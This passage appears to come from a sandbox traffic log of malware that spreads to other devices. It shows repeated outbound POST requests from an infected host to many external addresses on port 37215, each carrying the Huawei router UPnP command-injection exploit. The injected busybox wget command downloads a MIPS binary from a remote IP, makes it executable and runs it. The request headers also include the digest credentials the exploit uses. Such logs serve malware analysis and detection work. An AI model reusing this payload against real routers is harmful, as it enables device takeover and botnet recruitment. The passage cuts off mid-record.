                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1005192.168.2.1336644156.69.102.15337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.459441900 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1006192.168.2.1350662197.233.62.23337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.461126089 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1007192.168.2.135955241.53.161.537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.462424040 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1008192.168.2.1345158197.249.126.21437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.463843107 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1009192.168.2.134172641.189.245.17537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.465118885 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1010192.168.2.1352164197.127.27.21137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.466331959 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1011192.168.2.1333884156.0.191.13337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.467689991 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1012192.168.2.134753841.23.47.21537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.469310999 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1013192.168.2.1352048197.236.147.21537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.470695019 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1014192.168.2.134636241.191.78.14137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.473135948 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 